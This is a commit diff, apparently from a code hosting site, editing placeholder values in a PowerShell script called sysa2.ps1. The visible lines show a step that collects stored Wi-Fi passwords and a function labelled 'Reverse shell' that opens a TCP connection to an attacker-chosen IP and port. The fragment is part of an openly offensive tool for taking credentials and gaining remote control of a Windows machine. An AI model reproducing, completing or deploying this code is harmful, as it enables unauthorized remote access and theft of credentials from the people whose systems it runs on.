Update sysa2.ps1

pull/466/head
Nicolo’ 2024-07-24 14:25:51 +02:00 committed by GitHub
parent c57972728f
commit f84b6730e3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 2 deletions

View File

@ -101,8 +101,8 @@ GetWifiPasswords
# Reverse shell
function ReverseShell {
$ip = 'attacker IP'
$port = 'attacker port'
$ip = 'YOUR_IP'
$port = 'YOUR_PORT'
$client = New-Object System.Net.Sockets.TCPClient($ip, $port)
$stream = $client.GetStream()